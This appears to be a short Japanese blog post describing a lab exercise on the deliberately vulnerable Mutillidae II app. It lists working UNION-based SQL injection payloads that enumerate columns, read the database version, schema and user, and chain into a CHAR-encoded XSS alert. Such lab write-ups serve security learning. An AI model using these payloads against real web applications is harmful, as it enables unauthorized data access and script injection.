Hello there, ('ω')ノ

 

久しぶりのMutillidae Ⅱを。

 

 

こちらにはSQLインジェクションの脆弱性があって。

UNIONを使って、カラム数と表示されるカラムを特定して。

　' union select null,1,2,3,null,null,null -- 

 

 

　' union select null,@@version,schema(),system_user(),null,null,null -- 

 

 

次に数字を文字に変えてみるとエラーとなるため。

　' union select null,A,null,null,null,null,null -- 

 

 

下記のような関数を使用すると。

　' union select null,char(65),null,null,null,null,null -- 

 

 

下記のサイトで、ペイロードの文字列をASCIIに変換して。

http://web-apps.nbookmark.com/ascii-converter/

 

 

下記を実行するとXSSが機能して。

' union select null,CHAR(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,88,83,83,39,41,60,47,115,99,114,105,112,116,62),null,null,null,null,null -- 

 

 

 

Best regards, (^^ゞ